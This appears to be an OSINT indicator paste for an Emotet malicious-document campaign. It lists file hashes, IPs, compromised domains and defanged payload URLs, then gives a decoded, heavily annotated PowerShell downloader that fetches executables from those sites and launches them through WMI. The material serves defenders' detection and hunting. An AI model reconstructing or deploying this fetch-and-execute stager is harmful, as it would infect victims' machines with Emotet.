paladin316

Emotet_Doc_out_2020-08-12_13_30.txt

Aug 12th, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256:
  4.  
  5. 44b8c2c694e595c5c101cd70e1c07cb585b19db23cfd60049e3fe445f6df525d
  6. 6e9b1ad824b0bc35792a2ec92fabb0456af70c654e99e5f6d0067903f3c771ce
  7. 52b725e19110d9c7b614784f84880a6f9e181c033ba521b012662ada81fc1cb7
  8. 239b0c4f5e150bac96fff321ed672e0772718018ae715db9d4feb0b59879fbb7
  9. bdc6eceba4b95bac120bfeb41f35e7df45c0f48d1188331f7085b65431d29398
  10. b06fa4a03274712b0d1bea0d2a5d1afc2c71541acb80b1054d31b661b67514ea
  11. 16e038d9e33c53b2a57906401ffe6a6980d0b45d153610dc7b2b7e4257a3c6e7
  12. b16f77072d09279154089c427fc5151bc941751fde11d2e043d11f89f579d009
  13. 96c9ac5b39fd07ad898f381241ff17d003a4a90f6f87ab45d8dd74634ca67b13
  14. f72ce180f7fc38f18740d42dd0b6684e21e94348fe952221eb9a8f3c01400eb6
  15. f4a1c1efb7093c25364d501dddf8dac96dccf05f85d85d2947f5a5d2a687280d
  16. 120d8c2be86854307eaeb869f66dd85a90512e616a6390ebaf05c781ee48a6b3
  17. 59ab542232a464397ef49e4cf9c531e4570fece1fd69a64bf56b7abc56e3d859
  18. 8cc695377181d100d98ff6883804563f0a475e76454a98fe4c083005337e54ec
  19. 38de02c634244bac2df0a0e467d1eaee89645b9f33c1927e04ccf08761264d47
  20. 7f3f157b6efccbe88e544e49aa6b5571503e8f8e2d187cb88f30a38860b1537b
  21.  
  22.  
  23. IPs (the paste does not state how these relate to the domains/URLs below, e.g. hosting vs. C2 — treat them as lower-confidence indicators and verify before blocking):
  24. 101.50.1.19
  25. 104.238.124.62
  26. 104.42.146.120
  27. 132.148.143.123
  28. 13.234.36.77
  29. 192.34.63.244
  30. 44.230.149.196
  31. 47.241.2.252
  32. 88.99.211.112
  33. 99.198.101.186
  34.  
  35. Domains (the wp-content/, wp-admin/ and cgi-bin/ paths in the URLs below suggest compromised legitimate sites; block the full URL path where possible to limit collateral impact):
  36.  
  37. af.rologyx.com
  38. beeptool.com
  39. besanads.com
  40. blog.newforceltd.com
  41. c8xtt.com
  42. dpsoma.com
  43. samontime.com
  44. scoopmagazines.com
  45. sindobatam.com
  46. techycivil.com
  47.  
  48. Payload URLs (defanged: hxxp = http, hxxps = https; two lists of five, matching the two download loops in the PowerShell below):
  49. hxxps://samontime.com/wp-content/M7cidlobkp899135/
  50. hxxp://techycivil.com/wp-content/wvr/
  51. hxxp://scoopmagazines.com/wp-content/uploads/2020/sEsCvKF/
  52. hxxp://besanads.com/wp-admin/PbgJVpz/
  53. hxxp://sindobatam.com/cgi-bin/5yq6g129/
  54. hxxp://blog.newforceltd.com/wp-content/uploads/qf/
  55. hxxps://c8xtt.com/wb/jDDwc504077/
  56. hxxps://af.rologyx.com/sites/i4vBd0msh/
  57. hxxps://beeptool.com/wp-admin/zyZ67961/
  58. hxxps://dpsoma.com/crm/vUQz884/
  59.  
  60.  
  61. Decoded Base64 PowerShell (URLs defanged; the '*'-delimited URL strings appear to have been split one URL per line for readability, so the listing is not runnable as pasted):
  # Emotet maldoc stage-1 downloader (decoded from the base64 -EncodedCommand; the
  # encoding step itself is not shown on this page). The listing holds two
  # near-identical download loops, each with its own URL list, drop filename and
  # minimum-size gate. The first loop ends at `$JELRGlcb='NGNRWvsk'` with no
  # trailing ';', exactly like the second ends at `$JHBBRvdm='CTJIEman'`, so this
  # looks like two decoded scripts concatenated — NOTE(review): confirm against
  # the original samples before treating it as one stager.
  # Obfuscation present: member names split with backticks ("S`ec`URITYpr`OtOcoL"
  # — the backtick before an ordinary letter is a no-op, and member lookup is
  # case-insensitive), cmdlet names built from concatenated fragments and
  # invoked via & or the dot operator, and random 8-letter variable assignments
  # that are never read. None of this changes behaviour; it only breaks
  # string-based signatures. URLs are defanged (hxxp), so nothing here runs as
  # pasted.
  62. $NMROOzgm='KLNDVdmf';   # dead: never referenced
  63. [Net.ServicePointManager]::"S`ec`URITYpr`OtOcoL" = 'tls12, tls11, tls';   # allow TLS 1.2/1.1/1.0 for the HTTPS fetches
  64. $BVFWBptf = '413';   # basename of the dropped executable
  65. $EPVRZkhp='HPXXCocy';   # dead
  66. $DUNQDywm=$env:userprofile+'\'+$BVFWBptf+'.exe';   # drop path: %USERPROFILE%\413.exe
  67. $OGNJRema='XZBKWeta';   # dead
  68. $CURKOwif=&('ne'+'w-obje'+'ct') NET.WebClIent;   # New-Object Net.WebClient
  69. $USUNLijk='hxxps://samontime.com/wp-content/M7cidlobkp899135/
  70. hxxp://techycivil.com/wp-content/wvr/
  71. hxxp://scoopmagazines.com/wp-content/uploads/2020/sEsCvKF/
  72. hxxp://besanads.com/wp-admin/PbgJVpz/
  73. hxxp://sindobatam.com/cgi-bin/5yq6g129/'."sp`lIt"([char]42);   # .Split('*'): the original string was presumably '*'-delimited; as pasted (newline-separated) this would yield a single element
  74. $RUSDGkte='NNLPTetq';   # dead
  75. foreach($ERMRHnpl in $USUNLijk){try{$CURKOwif."doWnLoa`DfI`LE"($ERMRHnpl, $DUNQDywm);   # WebClient.DownloadFile(url, %USERPROFILE%\413.exe) for each URL in turn
  76. $MUYRFyaj='KXTSEbek';   # dead
  77. If ((&('Get-It'+'e'+'m') $DUNQDywm)."leng`Th" -ge 23021) {([wmiclass]'win32_Process')."cr`e`ATe"($DUNQDywm);   # (Get-Item drop).Length -ge 23021 bytes, then Win32_Process.Create(drop) launches it; the size gate presumably filters error pages / truncated downloads
  78. $LADQMaym='IGWRFahg';   # dead
  79. break;   # leave this foreach once a payload has been launched (the second loop below still runs)
  80. $APTDWujg='UJKLIasf'}}catch{}}$JELRGlcb='NGNRWvsk'$NCVHLgby='CATPTxiv';   # catch{} swallows every error and moves to the next URL; the two assignments here have no ';' between them (parse error as pasted — likely where script 1 ends and script 2 begins)
  81. [Net.ServicePointManager]::"s`EcUr`it`yPROto`cOl" = 'tls12, tls11, tls';   # second loop: same TLS setup
  82. $UWFTVhcw = '119';   # basename of the second dropped executable
  83. $SPMIUcfh='ASUNKxfy';   # dead
  84. $NQEKRoch=$env:userprofile+'\'+$UWFTVhcw+'.exe';   # drop path: %USERPROFILE%\119.exe
  85. $FFYJTczg='FDHKZevd';   # dead
  86. $QALMYzjt=.('n'+'ew-obj'+'ect') neT.WeBClIEnt;   # New-Object Net.WebClient, invoked with the dot operator instead of &
  87. $DGBLBnzd='hxxp://blog.newforceltd.com/wp-content/uploads/qf/
  88. hxxps://c8xtt.com/wb/jDDwc504077/
  89. hxxps://af.rologyx.com/sites/i4vBd0msh/
  90. hxxps://beeptool.com/wp-admin/zyZ67961/
  91. hxxps://dpsoma.com/crm/vUQz884/'."SP`LIT"([char]42);   # .Split('*'), same caveat as above
  92. $BTBFFziy='INJRNzop';   # dead
  93. foreach($TOCQGwsa in $DGBLBnzd){try{$QALMYzjt."d`owNloA`df`ilE"($TOCQGwsa, $NQEKRoch);   # WebClient.DownloadFile(url, %USERPROFILE%\119.exe)
  94. $IJWJIola='KPTQRhne';   # dead
  95. If ((.('Get-'+'Item') $NQEKRoch)."LENg`Th" -ge 24008) {([wmiclass]'win32_Process')."CrE`A`TE"($NQEKRoch);   # size gate 24008 bytes, then Win32_Process.Create(drop)
  96. $AZZBUirs='NPIWJhnu';   # dead
  97. break;   # stop after the first payload that passes the size gate
  98. $RKNTFvxj='RVBDJuvp'}}catch{}}$JHBBRvdm='CTJIEman'
  # Hunting pivots grounded in the code above: powershell.exe writing a
  # digits-only .exe directly under %USERPROFILE%, a process created through
  # WMI Win32_Process.Create (typically parented by WmiPrvSE rather than the
  # script host), and ServicePointManager.SecurityProtocol being set from a
  # script. Hashes of the dropped .exe are not given on this page.
  99.  